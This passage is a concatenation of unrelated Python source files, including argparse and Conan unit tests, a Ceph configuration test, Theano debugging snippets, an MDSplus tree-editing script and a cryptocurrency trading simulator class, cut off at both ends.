class TestOptionalsHelpVersionActions(TestCase):
"""Test the help and version actions"""
def _get_error(self, func, *args, **kwargs):
try:
func(*args, **kwargs)
except ArgumentParserError:
return sys.exc_info()[1]
else:
self.assertRaises(ArgumentParserError, func, *args, **kwargs)
def assertPrintHelpExit(self, parser, args_str):
self.assertEqual(
parser.format_help(),
self._get_error(parser.parse_args, args_str.split()).stdout)
def assertPrintVersionExit(self, parser, args_str):
self.assertEqual(
parser.format_version(),
self._get_error(parser.parse_args, args_str.split()).stderr)
def assertArgumentParserError(self, parser, *args):
self.assertRaises(ArgumentParserError, parser.parse_args, args)
def test_version(self):
parser = ErrorRaisingArgumentParser(version='1.0')
self.assertPrintHelpExit(parser, '-h')
self.assertPrintHelpExit(parser, '--help')
self.assertPrintVersionExit(parser, '-v')
self.assertPrintVersionExit(parser, '--version')
def test_version_format(self):
parser = ErrorRaisingArgumentParser(prog='PPP', version='%(prog)s 3.5')
msg = self._get_error(parser.parse_args, ['-v']).stderr
self.assertEqual('PPP 3.5\n', msg)
def test_version_no_help(self):
parser = ErrorRaisingArgumentParser(add_help=False, version='1.0')
self.assertArgumentParserError(parser, '-h')
self.assertArgumentParserError(parser, '--help')
self.assertPrintVersionExit(parser, '-v')
self.assertPrintVersionExit(parser, '--version')
def test_version_action(self):
parser = ErrorRaisingArgumentParser(prog='XXX')
parser.add_argument('-V', action='version', version='%(prog)s 3.7')
msg = self._get_error(parser.parse_args, ['-V']).stderr
self.assertEqual('XXX 3.7\n', msg)
def test_no_help(self):
parser = ErrorRaisingArgumentParser(add_help=False)
self.assertArgumentParserError(parser, '-h')
self.assertArgumentParserError(parser, '--help')
self.assertArgumentParserError(parser, '-v')
self.assertArgumentParserError(parser, '--version')
def test_alternate_help_version(self):
parser = ErrorRaisingArgumentParser()
parser.add_argument('-x', action='help')
parser.add_argument('-y', action='version')
self.assertPrintHelpExit(parser, '-x')
self.assertPrintVersionExit(parser, '-y')
self.assertArgumentParserError(parser, '-v')
self.assertArgumentParserError(parser, '--version')
def test_help_version_extra_arguments(self):
parser = ErrorRaisingArgumentParser(version='1.0')
parser.add_argument('-x', action='store_true')
parser.add_argument('y')
# try all combinations of valid prefixes and suffixes
valid_prefixes = ['', '-x', 'foo', '-x bar', 'baz -x']
valid_suffixes = valid_prefixes + ['--bad-option', 'foo bar baz']
for prefix in valid_prefixes:
for suffix in valid_suffixes:
format = '%s %%s %s' % (prefix, suffix)
self.assertPrintHelpExit(parser, format % '-h')
self.assertPrintHelpExit(parser, format % '--help')
self.assertPrintVersionExit(parser, format % '-v')
self.assertPrintVersionExit(parser, format % '--version')
# ======================
# str() and repr() tests
# ======================
class TestStrings(TestCase):
"""Test str() and repr() on Optionals and Positionals"""
def assertStringEqual(self, obj, result_string):
for func in [str, repr]:
self.assertEqual(func(obj), result_string)
def test_optional(self):
option = argparse.Action(
option_strings=['--foo', '-a', '-b'],
dest='b',
type='int',
nargs='+',
default=42,
choices=[1, 2, 3],
help='HELP',
metavar='METAVAR')
string = (
"Action(option_strings=['--foo', '-a', '-b'], dest='b', "
"nargs='+', const=None, default=42, type='int', "
"choices=[1, 2, 3], help='HELP', metavar='METAVAR')")
self.assertStringEqual(option, string)
def test_argument(self):
argument = argparse.Action(
option_strings=[],
dest='x',
type=float,
nargs='?',
default=2.5,
choices=[0.5, 1.5, 2.5],
help='H HH H',
metavar='MV MV MV')
string = (
"Action(option_strings=[], dest='x', nargs='?', "
"const=None, default=2.5, type=%r, choices=[0.5, 1.5, 2.5], "
"help='H HH H', metavar='MV MV MV')" % float)
self.assertStringEqual(argument, string)
def test_namespace(self):
ns = argparse.Namespace(foo=42, bar='spam')
string = "Namespace(bar='spam', foo=42)"
self.assertStringEqual(ns, string)
def test_parser(self):
parser = argparse.ArgumentParser(prog='PROG')
string = (
"ArgumentParser(prog='PROG', usage=None, description=None, "
"version=None, formatter_class=%r, conflict_handler='error', "
"add_help=True)" % argparse.HelpFormatter)
self.assertStringEqual(parser, string)
# ===============
# Namespace tests
# ===============
class TestNamespace(TestCase):
def test_constructor(self):
ns = argparse.Namespace()
self.assertRaises(AttributeError, getattr, ns, 'x')
ns = argparse.Namespace(a=42, b='spam')
self.assertEqual(ns.a, 42)
self.assertEqual(ns.b, 'spam')
def test_equality(self):
ns1 = argparse.Namespace(a=1, b=2)
ns2 = argparse.Namespace(b=2, a=1)
ns3 = argparse.Namespace(a=1)
ns4 = argparse.Namespace(b=2)
self.assertEqual(ns1, ns2)
self.assertNotEqual(ns1, ns3)
self.assertNotEqual(ns1, ns4)
self.assertNotEqual(ns2, ns3)
self.assertNotEqual(ns2, ns4)
self.assertTrue(ns1 != ns3)
self.assertTrue(ns1 != ns4)
self.assertTrue(ns2 != ns3)
self.assertTrue(ns2 != ns4)
# ===================
# File encoding tests
# ===================
class TestEncoding(TestCase):
def _test_module_encoding(self, path):
path, _ = os.path.splitext(path)
path += ".py"
with codecs.open(path, 'r', 'utf8') as f:
f.read()
def test_argparse_module_encoding(self):
self._test_module_encoding(argparse.__file__)
def test_test_argparse_module_encoding(self):
self._test_module_encoding(__file__)
# ===================
# ArgumentError tests
# ===================
class TestArgumentError(TestCase):
def test_argument_error(self):
msg = "my error here"
error = argparse.ArgumentError(None, msg)
self.assertEqual(str(error), msg)
# =======================
# ArgumentTypeError tests
# =======================
class TestArgumentTypeError(TestCase):
def test_argument_type_error(self):
def spam(string):
raise argparse.ArgumentTypeError('spam!')
parser = ErrorRaisingArgumentParser(prog='PROG', add_help=False)
parser.add_argument('x', type=spam)
try:
parser.parse_args(['XXX'])
except ArgumentParserError:
expected = 'usage: PROG x\nPROG: error: argument x: spam!\n'
msg = sys.exc_info()[1].stderr
self.assertEqual(expected, msg)
else:
self.fail()
# ======================
# parse_known_args tests
# ======================
class TestParseKnownArgs(TestCase):
def test_optionals(self):
parser = argparse.ArgumentParser()
parser.add_argument('--foo')
args, extras = parser.parse_known_args('--foo F --bar --baz'.split())
self.assertEqual(NS(foo='F'), args)
self.assertEqual(['--bar', '--baz'], extras)
def test_mixed(self):
parser = argparse.ArgumentParser()
parser.add_argument('-v', nargs='?', const=1, type=int)
parser.add_argument('--spam', action='store_false')
parser.add_argument('badger')
argv = ["B", "C", "--foo", "-v", "3", "4"]
args, extras = parser.parse_known_args(argv)
self.assertEqual(NS(v=3, spam=True, badger="B"), args)
self.assertEqual(["C", "--foo", "4"], extras)
# ==========================
# add_argument metavar tests
# ==========================
class TestAddArgumentMetavar(TestCase):
EXPECTED_MESSAGE = "length of metavar tuple does not match nargs"
def do_test_no_exception(self, nargs, metavar):
parser = argparse.ArgumentParser()
parser.add_argument("--foo", nargs=nargs, metavar=metavar)
def do_test_exception(self, nargs, metavar):
parser = argparse.ArgumentParser()
with self.assertRaises(ValueError) as cm:
parser.add_argument("--foo", nargs=nargs, metavar=metavar)
self.assertEqual(cm.exception.args[0], self.EXPECTED_MESSAGE)
# Unit tests for different values of metavar when nargs=None
def test_nargs_None_metavar_string(self):
self.do_test_no_exception(nargs=None, metavar="1")
def test_nargs_None_metavar_length0(self):
self.do_test_exception(nargs=None, metavar=tuple())
def test_nargs_None_metavar_length1(self):
self.do_test_no_exception(nargs=None, metavar=("1"))
def test_nargs_None_metavar_length2(self):
self.do_test_exception(nargs=None, metavar=("1", "2"))
def test_nargs_None_metavar_length3(self):
self.do_test_exception(nargs=None, metavar=("1", "2", "3"))
# Unit tests for different values of metavar when nargs=?
def test_nargs_optional_metavar_string(self):
self.do_test_no_exception(nargs="?", metavar="1")
def test_nargs_optional_metavar_length0(self):
self.do_test_exception(nargs="?", metavar=tuple())
def test_nargs_optional_metavar_length1(self):
self.do_test_no_exception(nargs="?", metavar=("1"))
def test_nargs_optional_metavar_length2(self):
self.do_test_exception(nargs="?", metavar=("1", "2"))
def test_nargs_optional_metavar_length3(self):
self.do_test_exception(nargs="?", metavar=("1", "2", "3"))
# Unit tests for different values of metavar when nargs=*
def test_nargs_zeroormore_metavar_string(self):
self.do_test_no_exception(nargs="*", metavar="1")
def test_nargs_zeroormore_metavar_length0(self):
self.do_test_exception(nargs="*", metavar=tuple())
def test_nargs_zeroormore_metavar_length1(self):
self.do_test_no_exception(nargs="*", metavar=("1"))
def test_nargs_zeroormore_metavar_length2(self):
self.do_test_no_exception(nargs="*", metavar=("1", "2"))
def test_nargs_zeroormore_metavar_length3(self):
self.do_test_exception(nargs="*", metavar=("1", "2", "3"))
# Unit tests for different values of metavar when nargs=+
def test_nargs_oneormore_metavar_string(self):
self.do_test_no_exception(nargs="+", metavar="1")
def test_nargs_oneormore_metavar_length0(self):
self.do_test_exception(nargs="+", metavar=tuple())
def test_nargs_oneormore_metavar_length1(self):
self.do_test_no_exception(nargs="+", metavar=("1"))
def test_nargs_oneormore_metavar_length2(self):
self.do_test_no_exception(nargs="+", metavar=("1", "2"))
def test_nargs_oneormore_metavar_length3(self):
self.do_test_exception(nargs="+", metavar=("1", "2", "3"))
# Unit tests for different values of metavar when nargs=...
def test_nargs_remainder_metavar_string(self):
self.do_test_no_exception(nargs="...", metavar="1")
def test_nargs_remainder_metavar_length0(self):
self.do_test_no_exception(nargs="...", metavar=tuple())
def test_nargs_remainder_metavar_length1(self):
self.do_test_no_exception(nargs="...", metavar=("1"))
def test_nargs_remainder_metavar_length2(self):
self.do_test_no_exception(nargs="...", metavar=("1", "2"))
def test_nargs_remainder_metavar_length3(self):
self.do_test_no_exception(nargs="...", metavar=("1", "2", "3"))
# Unit tests for different values of metavar when nargs=A...
def test_nargs_parser_metavar_string(self):
self.do_test_no_exception(nargs="A...", metavar="1")
def test_nargs_parser_metavar_length0(self):
self.do_test_exception(nargs="A...", metavar=tuple())
def test_nargs_parser_metavar_length1(self):
self.do_test_no_exception(nargs="A...", metavar=("1"))
def test_nargs_parser_metavar_length2(self):
self.do_test_exception(nargs="A...", metavar=("1", "2"))
def test_nargs_parser_metavar_length3(self):
self.do_test_exception(nargs="A...", metavar=("1", "2", "3"))
# Unit tests for different values of metavar when nargs=1
def test_nargs_1_metavar_string(self):
self.do_test_no_exception(nargs=1, metavar="1")
def test_nargs_1_metavar_length0(self):
self.do_test_exception(nargs=1, metavar=tuple())
def test_nargs_1_metavar_length1(self):
self.do_test_no_exception(nargs=1, metavar=("1"))
def test_nargs_1_metavar_length2(self):
self.do_test_exception(nargs=1, metavar=("1", "2"))
def test_nargs_1_metavar_length3(self):
self.do_test_exception(nargs=1, metavar=("1", "2", "3"))
# Unit tests for different values of metavar when nargs=2
def test_nargs_2_metavar_string(self):
self.do_test_no_exception(nargs=2, metavar="1")
def test_nargs_2_metavar_length0(self):
self.do_test_exception(nargs=2, metavar=tuple())
def test_nargs_2_metavar_length1(self):
self.do_test_no_exception(nargs=2, metavar=("1"))
def test_nargs_2_metavar_length2(self):
self.do_test_no_exception(nargs=2, metavar=("1", "2"))
def test_nargs_2_metavar_length3(self):
self.do_test_exception(nargs=2, metavar=("1", "2", "3"))
# Unit tests for different values of metavar when nargs=3
def test_nargs_3_metavar_string(self):
self.do_test_no_exception(nargs=3, metavar="1")
def test_nargs_3_metavar_length0(self):
self.do_test_exception(nargs=3, metavar=tuple())
def test_nargs_3_metavar_length1(self):
self.do_test_no_exception(nargs=3, metavar=("1"))
def test_nargs_3_metavar_length2(self):
self.do_test_exception(nargs=3, metavar=("1", "2"))
def test_nargs_3_metavar_length3(self):
self.do_test_no_exception(nargs=3, metavar=("1", "2", "3"))
# ============================
# from argparse import * tests
# ============================
class TestImportStar(TestCase):
def test(self):
for name in argparse.__all__:
self.assertTrue(hasattr(argparse, name))
def test_all_exports_everything_but_modules(self):
items = [
name
for name, value in vars(argparse).items()
if not name.startswith("_")
if not inspect.ismodule(value)
]
self.assertEqual(sorted(items), sorted(argparse.__all__))
def test_main():
# silence warnings about version argument - these are expected
with test_support.check_warnings(
('The "version" argument to ArgumentParser is deprecated.',
DeprecationWarning),
('The (format|print)_version method is deprecated',
DeprecationWarning)):
test_support.run_unittest(__name__)
# Remove global references to avoid looking like we have refleaks.
RFile.seen = {}
WFile.seen = set()
if __name__ == '__main__':
test_main()
|
py
|
1a5f06d9037b32a5c80f70a7ed1b21a2b3bd8a84
|
import os
import platform
import textwrap
import unittest
from conans.test.utils.tools import TestClient
from conans.util.runners import check_output_runner
class VirtualBuildEnvTest(unittest.TestCase):
@unittest.skipUnless(platform.system() == "Windows", "needs Windows")
def test_delimiter_error(self):
# https://github.com/conan-io/conan/issues/3080
conanfile = """from conans import ConanFile
class TestConan(ConanFile):
settings = "os", "compiler", "arch", "build_type"
"""
client = TestClient()
client.save({"conanfile.py": conanfile})
client.run('install . -g virtualbuildenv -s os=Windows -s compiler="Visual Studio"'
' -s compiler.runtime=MD -s compiler.version=15')
bat = client.load("environment_build.bat.env")
self.assertIn("UseEnv=True", bat)
self.assertIn('CL=-MD -DNDEBUG -O2 -Ob2 %CL%', bat)
def test_environment_deactivate(self):
if platform.system() == "Windows":
""" This test fails. The deactivation script takes the value of some envvars set by
the activation script to recover the previous values (set PATH=OLD_PATH). As this
test is running each command in a different shell, the envvar OLD_PATH that has
been set by the 'activate' script doesn't exist when we run 'deactivate' in a
different shell...
TODO: Remove this test
"""
self.skipTest("This won't work in Windows")
in_windows = platform.system() == "Windows"
env_cmd = "set" if in_windows else "env"
extension = "bat" if in_windows else "sh"
def env_output_to_dict(env_output):
env = {}
for line in env_output.splitlines():
tmp = line.split("=")
# OLDPWD is cleared when a child script is started
if tmp[0] not in ["SHLVL", "_", "PS1", "OLDPWD"]:
env[tmp[0]] = tmp[1].replace("\\", "/")
return env
def get_cmd(script_name):
if in_windows:
return "%s && set" % script_name
else:
return "bash -c 'source %s && env'" % script_name
conanfile = textwrap.dedent("""
from conans import ConanFile
class TestConan(ConanFile):
settings = "os", "compiler", "arch", "build_type"
generators = "virtualbuildenv"
""")
client = TestClient(path_with_spaces=False)
client.save({"conanfile.py": conanfile})
client.run("install .")
output = check_output_runner(env_cmd)
normal_environment = env_output_to_dict(output)
client.run("install .")
act_build_file = os.path.join(client.current_folder, "activate_build.%s" % extension)
deact_build_file = os.path.join(client.current_folder, "deactivate_build.%s" % extension)
self.assertTrue(os.path.exists(act_build_file))
self.assertTrue(os.path.exists(deact_build_file))
output = check_output_runner(get_cmd(act_build_file))
activate_environment = env_output_to_dict(output)
self.assertNotEqual(normal_environment, activate_environment)
output = check_output_runner(get_cmd(deact_build_file))
deactivate_environment = env_output_to_dict(output)
self.assertDictEqual(normal_environment, deactivate_environment)
|
py
|
1a5f0713ccf4857840a63ec0f7a63a7c660d6769
|
import csv
lang=set()
with open('tasks-skills.csv') as f:
c = csv.reader(f, delimiter=',')
c.next()
for row in c:
if row[2] not in lang:
lang.add(row[2])
print len(lang)
print lang
|
py
|
1a5f075a84a7b2a4f3accf3503969ec3993c0265
|
import os
import requests
url = "https://api.textlocal.in/send/"
def send_sms(phone, message):
params = {
"apikey": os.getenv("TEXTLOCAL_API_KEY"),
"numbers": phone,
"message": message,
"sender": "CTZNVS",
"test": True,
}
response = requests.get(url, params=params)
return response.text
|
py
|
1a5f08a24762b1e113ed0db6d59c3ecc64dd0ca2
|
"""
WSGI config for process_rss_feeds project.
It exposes the WSGI callable as a module-level variable named ``application``.
For more information on this file, see
https://docs.djangoproject.com/en/3.0/howto/deployment/wsgi/
"""
import os
from django.core.wsgi import get_wsgi_application
os.environ.setdefault('DJANGO_SETTINGS_MODULE', 'process_rss_feeds.settings')
application = get_wsgi_application()
|
py
|
1a5f0abbf58d085aa0f1d31990af9737f145f28c
|
import logging
import pytest
from ocs_ci.framework.testlib import ManageTest, tier1
from ocs_ci.ocs.resources import pod
from ocs_ci.ocs.cluster import get_pg_balancer_status
log = logging.getLogger(__name__)
@tier1
@pytest.mark.polarion_id("OCS-2231")
class TestCephDefaultValuesCheck(ManageTest):
def test_ceph_default_values_check(self):
"""
This test checks ceph default values taken from OCS 4.3 with the
current values in the cluster
"""
# The default ceph osd full ratio values
expected_full_ratios = {
'full_ratio': 0.85,
'backfillfull_ratio': 0.8,
'nearfull_ratio': 0.75
}
actual_full_ratios = {}
ct_pod = pod.get_ceph_tools_pod()
log.info("Checking the values of ceph osd full ratios in osd map")
osd_dump_dict = ct_pod.exec_ceph_cmd('ceph osd dump')
for ratio_parm, value in expected_full_ratios.items():
ratio_value = osd_dump_dict.get(ratio_parm)
actual_full_ratios[ratio_parm] = float(round(ratio_value, 2))
if not float(round(ratio_value, 2)) == value:
log.error(
f"Actual {ratio_parm} value is {ratio_value:.2f} NOT "
f"matching the expected value {value}"
)
assert expected_full_ratios == actual_full_ratios, (
"Actual full ratio values does not match expected full "
"ratio values"
)
log.info(
f"Actual full ratio {actual_full_ratios} values MATCHES expected "
f"full ratio values {expected_full_ratios}"
)
# Check if the osd full ratios satisfies condition
# "nearfull < backfillfull < full"
assert (
osd_dump_dict[
'nearfull_ratio'
] < osd_dump_dict[
'backfillfull_ratio'
] < osd_dump_dict[
'full_ratio'
]
), (
"osd full ratio values does not satisfy condition "
f"{osd_dump_dict['nearfull_ratio']:.2f} < "
f"{osd_dump_dict['backfillfull_ratio']:.2f} < "
f"{osd_dump_dict['full_ratio']:.2f}"
)
log.info(
"osd full ratio values satisfies condition "
f"{osd_dump_dict['nearfull_ratio']:.2f} < "
f"{osd_dump_dict['backfillfull_ratio']:.2f} < "
f"{osd_dump_dict['full_ratio']:.2f}"
)
# Check if PG balancer is active
assert get_pg_balancer_status(), "PG balancer is not active"
|
py
|
1a5f0b8dbea7248e2364b4b4907d1fa9678f9dac
|
import theano
import numpy
import numpy as np
from theano import tensor as T
__author__ = 'Jeff Ye'
def print_ndarray_shape():
"""
this shows how to print ndarray shape as well as the change before and after executing the function.
link: http://deeplearning.net/software/theano/tutorial/debug_faq.html#how-do-i-print-an-intermediate-value-in-a-function-method
"""
def inspect_inputs(i, node, fn):
print i, node, "\ninput(s) value(s):", [input[0].shape for input in fn.inputs],
def inspect_outputs(i, node, fn):
print "\noutput(s) value(s):", [output[0] for output in fn.outputs]
x = theano.tensor.matrix('x')
f = theano.function([x], [5 * x],
mode=theano.compile.MonitorMode(
pre_func=inspect_inputs,
post_func=inspect_outputs))
f(numpy.arange(10).reshape(2, 5))
def print_detect_nan():
def detect_nan(i, node, fn):
for output in fn.outputs:
if not isinstance(output[0], numpy.random.RandomState) and numpy.isnan(output[0]).any():
print '*** NaN detected ***'
theano.printing.debugprint(node)
print 'Inputs : %s' % [input[0] for input in fn.inputs]
print 'Outputs: %s' % [output[0] for output in fn.outputs]
break
x = theano.tensor.dscalar('x')
f = theano.function([x], [theano.tensor.log(x) * x],
mode=theano.compile.MonitorMode(
post_func=detect_nan))
f(0) # log(0) * 0 = -inf * 0 = NaN
def test_value():
from keras.layers.core import Dense
from theano import pp, function
theano.config.compute_test_value = 'warn'
# since the test input value is not aligned with the requirement in Dense,
# it will report error quickly. Change 100 to 1000 will be fine.
t_value = np.zeros((500, 1000), dtype=np.float32)
X = T.matrix()
X.tag.test_value = t_value
d = Dense(200, input_dim=1000)
# d1 = Dense(200, input_dim=1000)
d.build()
z = d(X)
f = function([X], z)
# turn it off after
theano.config.compute_test_value = 'off'
if __name__ == "__main__":
test_value()
|
py
|
1a5f0ddeb904ca7ed206e550970630e0740fffd5
|
from __future__ import annotations
from typing import Dict, Optional, List
from enum import Enum
import json
import os
CONFIG_PATH = "~/.community-operator-dev/config.json"
FULL_CONFIG_PATH = os.path.expanduser(CONFIG_PATH)
class Distro(Enum):
UBUNTU = 0
UBI = 1
@staticmethod
def from_string(distro_name: str) -> Distro:
distro_name = distro_name.lower()
return {
"ubuntu": Distro.UBUNTU,
"ubi": Distro.UBI,
}[distro_name]
def get_config_path() -> str:
return os.getenv("MONGODB_COMMUNITY_CONFIG", FULL_CONFIG_PATH)
class DevConfig:
"""
DevConfig is a wrapper around the developer configuration file
"""
def __init__(self, config: Dict, distro: Distro):
self._config = config
self._distro = distro
self.include_tags: List[str] = []
self.skip_tags: List[str] = []
def ensure_tag_is_run(self, tag: str) -> None:
if tag not in self.include_tags:
self.include_tags.append(tag)
if tag in self.skip_tags:
self.skip_tags.remove(tag)
@property
def namespace(self) -> str:
return self._config["namespace"]
@property
def repo_url(self) -> str:
return self._config["repo_url"]
@property
def s3_bucket(self) -> str:
return self._config["s3_bucket"]
@property
def expire_after(self) -> str:
return self._config.get("expire_after", "never")
@property
def operator_image(self) -> str:
return self._config["operator_image"]
@property
def e2e_image(self) -> str:
return self._config["e2e_image"]
@property
def version_upgrade_hook_image(self) -> str:
return self._config["version_upgrade_hook_image"]
@property
def agent_image(self) -> str:
if self._distro == Distro.UBI:
return self._config["agent_image_ubi"]
return self._config["agent_image_ubuntu"]
def ensure_skip_tag(self, tag: str) -> None:
if tag not in self.skip_tags:
self.skip_tags.append(tag)
def load_config(
config_file_path: Optional[str] = None, distro: Distro = Distro.UBUNTU
) -> DevConfig:
if config_file_path is None:
config_file_path = get_config_path()
try:
with open(config_file_path, "r") as f:
return DevConfig(json.loads(f.read()), distro=distro)
except FileNotFoundError:
print(
f"No DevConfig found. Please ensure that the configuration file exists at '{config_file_path}'"
)
raise
|
py
|
1a5f0df361027770f1e22ad6d5eb8b8f1ec2d956
|
import sys
import typing
import numpy as np
def set_val(
a: np.array,
i: int,
x: int,
) -> typing.NoReturn:
while i < a.size:
a[i] = max(a[i], x)
i += i & -i
def get_mx(
a: np.array,
i: int,
) -> int:
mx = 0
while i > 0:
mx = max(mx, a[i])
i -= i & -i
return mx
def solve(
n: int,
h: np.array,
a: np.array,
) -> typing.NoReturn:
fw = np.zeros(
n + 1,
dtype=np.int64,
)
mx = 0
for i in range(n):
v = get_mx(fw, h[i] - 1)
set_val(fw, h[i], v + a[i])
print(get_mx(fw, n))
def main() -> typing.NoReturn:
n = int(input())
h = np.array(
sys.stdin.readline()
.split(),
dtype=np.int64,
)
a = np.array(
sys.stdin.readline()
.split(),
dtype=np.int64,
)
solve(n, h, a)
OJ = 'ONLINE_JUDGE'
if sys.argv[-1] == OJ:
from numba import i8, njit
from numba.pycc import CC
cc = CC('my_module')
fn = solve
sig = (i8, i8[:], i8[:])
get_mx = njit(get_mx)
set_val = njit(set_val)
cc.export(
fn.__name__,
sig,
)(fn)
cc.compile()
exit(0)
from my_module import solve
main()
|
py
|
1a5f0e09f6a0fc873dc6fcc836a2baa2367c9840
|
#SwapDigitizerNumber.py
#This script swaps the tree references associating coil signal lines with a particular digitizer. When ACQ_216_1 died, we had to move the coils to ACQ_216_3. Now that ACQ_216_1 is resurrected, we need to switch the references back.
#
#Usage:
# python SwapDigitizerNumber.py [s1 [s2]]
#
# Default: Shot -1 (model tree)
# range between shots s1 and s2, including s1 and s2.
#Ted Golfinopoulos, 25 Apr 2012
from MDSplus import *
import sys #For getting command line arguments
import re #Import regular expressions.
#Parse command line arguments.
if(len(sys.argv)>1) :
s1=int(sys.argv[1]) #Grab shot number from command line.
else :
s1=-1 #Default to shot -1
if(len(sys.argv)>2) :
s2=int(sys.argv[2]) #Grab shot number from command line.
elif(s1==-1) :
s2=s1 #If s1 is the model tree, only do s=-1; don't run to s=0
else :
s2=s1 #Only do a single shot
digFrom='ACQ_216_3' #Change digitizer from this
digTo='ACQ_216_1' #Change digitizer to this
#Loop through range of shots
for s in range(s1,s2+1) :
tree=Tree('magnetics',s)
nodeArr=tree.getNode('active_mhd.signals').getNodeWild('BP*') #Grab all shoelace subnodes
#Loop through all nodes
for n in nodeArr :
#print(n)
try :
expr=n.getData()
#print(str(expr))
try :
if (len(re.findall(digFrom, str(expr)))>0) :#If there are matches, replace old digitizer name with new.
newExpr=re.sub(digFrom, digTo, str(expr)) #Need to to-string expression in order for regular expression to work.
#print(str(n) + ' -> ' + str(newExpr))
n.putData(Data.compile(newExpr)) #Put new expression into node.
print( str(n)+" --- Now contains: "+str(n.getData()) )
except : print("String replacement didn't work. Expr was "+str(expr))
except TreeNoDataException :
#Continue
print("No data in "+n.getPath()+"; moving on.")
|
py
|
1a5f0e68068b5585cbc835031b3e0e963076e605
|
"""SimulationOperator를 사용해서 시뮬레이션을 컨트롤하는 Simulator 클래스"""
import signal
import time
from . import (
LogManager,
Analyzer,
SimulationTrader,
SimulationDataProvider,
StrategyBuyAndHold,
StrategySma0,
SimulationOperator,
DateConverter,
)
class Simulator:
"""자동 거래 시뮬레이터 클래스
command_list:
{
guide: 화면에 출력될 명령어와 안내문
cmd: 입력 받은 명령어와 매칭되는 문자열
action: 명령어가 입력되었을때 실행되는 객체
}
config_list:
{
guide: 화면에 출력될 설정값과 안내문
value: 출력될 현재값
action: 입력 받은 설정값을 처리해주는 객체
}
"""
MAIN_STATEMENT = "input command (h:help): "
def __init__(
self,
budget=50000,
interval=2,
strategy=0,
from_dash_to="201220.170000-201220.180000",
currency="BTC",
):
self.logger = LogManager.get_logger("Simulator")
self.__terminating = False
self.start_str = "200430.170000"
self.end_str = "200430.180000"
self.interval = interval
self.operator = None
self.strategy = int(strategy)
self.budget = int(budget)
self.need_init = True
self.currency = currency
self.interval = float(self.interval)
start_end = from_dash_to.split("-")
self.start_str = start_end[0]
self.end_str = start_end[1]
self.command_list = [
{
"guide": "h, help print command info",
"cmd": ["help", "h"],
"action": self.print_help,
},
{
"guide": "r, run start running simulation",
"cmd": ["run", "r"],
"action": self.start,
},
{
"guide": "s, stop stop running simulation",
"cmd": ["stop", "s"],
"action": self._stop,
},
{
"guide": "t, terminate terminate simulator",
"cmd": ["terminate", "t"],
"action": self.terminate,
},
{
"guide": "i, initialize initialize simulation",
"cmd": ["initialize", "i"],
"action": self.initialize_with_command,
},
{
"guide": "1, state query operating state",
"cmd": ["1"],
"action": self._print_state,
},
{
"guide": "2, score query current score",
"cmd": ["2"],
"action": self._print_score,
},
{
"guide": "3, result query trading result",
"cmd": ["3"],
"action": self._print_trading_result,
},
]
self.config_list = [
{
"guide": "년월일.시분초 형식으로 시작 시점 입력. 예. 201220.162300",
"value": self.start_str,
"action": self._set_start_str,
},
{
"guide": "년월일.시분초 형식으로 종료 시점 입력. 예. 201220.162300",
"value": self.end_str,
"action": self._set_end_str,
},
{
"guide": "거래 간격 입력. 예. 1",
"value": self.interval,
"action": self._set_interval,
},
{
"guide": "예산 입력. 예. 50000",
"value": self.budget,
"action": self._set_budget,
},
{
"guide": "전략 번호 입력. 0: Buy and Hold, 1: SMA-0",
"value": self.strategy,
"action": self._set_strategy,
},
{
"guide": "화폐 코드 입력. BTC, ETH",
"value": self.currency,
"action": self._set_currency,
},
]
def initialize(self):
"""시뮬레이션 초기화"""
dt = DateConverter.to_end_min(self.start_str + "-" + self.end_str)
end = dt[0][1]
count = dt[0][2]
if self.strategy == 0:
strategy = StrategyBuyAndHold()
else:
strategy = StrategySma0()
strategy.is_simulation = True
self.operator = SimulationOperator()
self._print_configuration(strategy.NAME)
data_provider = SimulationDataProvider(currency=self.currency)
data_provider.initialize_simulation(end=end, count=count)
trader = SimulationTrader(currency=self.currency)
trader.initialize_simulation(end=end, count=count, budget=self.budget)
analyzer = Analyzer()
analyzer.is_simulation = True
self.operator.initialize(
data_provider,
strategy,
trader,
analyzer,
budget=self.budget,
)
self.operator.tag = self._make_tag(self.start_str, self.end_str, strategy.NAME)
self.operator.set_interval(self.interval)
self.need_init = False
@staticmethod
def _make_tag(start_str, end_str, strategy_name):
return "SIM-" + strategy_name + "-" + start_str + "-" + end_str
def start(self):
"""시뮬레이션 시작, 재시작"""
if self.operator is None or self.need_init:
self._print("초기화가 필요합니다")
return
self.logger.info("Simulation start! ============================")
if self.operator.start() is not True:
self._print("Fail operator start")
return
def stop(self, signum, frame):
"""시뮬레이션 중지"""
self._stop()
self.__terminating = True
self._print(f"Receive Signal {signum} {frame}")
self._print("Stop Singing")
def _stop(self):
if self.operator is not None:
self.operator.stop()
self.need_init = True
self._print("프로그램을 재시작하려면 초기화하세요")
def terminate(self):
"""시뮬레이터 종료"""
self._print("Terminating......")
self._stop()
self.__terminating = True
self._print("Good Bye~")
def run_single(self):
"""인터렉션 없이 초기 설정 값으로 단독 1회 실행"""
self.initialize()
self.start()
while self.operator.state == "running":
time.sleep(0.5)
self.terminate()
def main(self):
"""main 함수"""
signal.signal(signal.SIGINT, self.stop)
signal.signal(signal.SIGTERM, self.stop)
while not self.__terminating:
try:
key = input(self.MAIN_STATEMENT)
self.on_command(key)
except EOFError:
break
def on_command(self, key):
"""커맨드 처리"""
for cmd in self.command_list:
if key.lower() in cmd["cmd"]:
cmd["action"]()
return
self._print("invalid command")
def print_help(self):
"""가이드 문구 출력"""
self._print("command list =================")
for item in self.command_list:
self._print(item["guide"], True)
def initialize_with_command(self):
"""설정 값을 입력받아서 초기화 진행"""
for config in self.config_list:
self._print(config["guide"])
value = input(f"현재값: {config['value']} >> ")
value = config["value"] if value == "" else value
self._print(f"설정값: {value}")
config["action"](value)
self.initialize()
def _set_start_str(self, value):
self.start_str = value
def _set_end_str(self, value):
self.end_str = value
def _set_interval(self, value):
next_value = float(value)
if next_value > 0:
self.interval = next_value
def _set_budget(self, value):
next_value = int(value)
if next_value > 0:
self.budget = next_value
def _set_strategy(self, value):
self.strategy = int(value)
def _set_currency(self, value):
self.currency = value
def _print_state(self):
if self.operator is None:
self._print("초기화가 필요합니다")
return
self._print(self.operator.state)
def _print_configuration(self, strategy_name):
self._print("Simulation Configuration =====")
self._print(f"Simulation Period {self.start_str} ~ {self.end_str}")
self._print(f"Budget: {self.budget}, Interval: {self.interval}")
self._print(f"Strategy: {strategy_name}")
def _print_score(self):
def print_score_and_main_statement(score):
self._print("current score ==========")
self._print(score)
self._print(self.MAIN_STATEMENT)
self.operator.get_score(print_score_and_main_statement)
def _print_trading_result(self):
results = self.operator.get_trading_results()
if results is None or len(results) == 0:
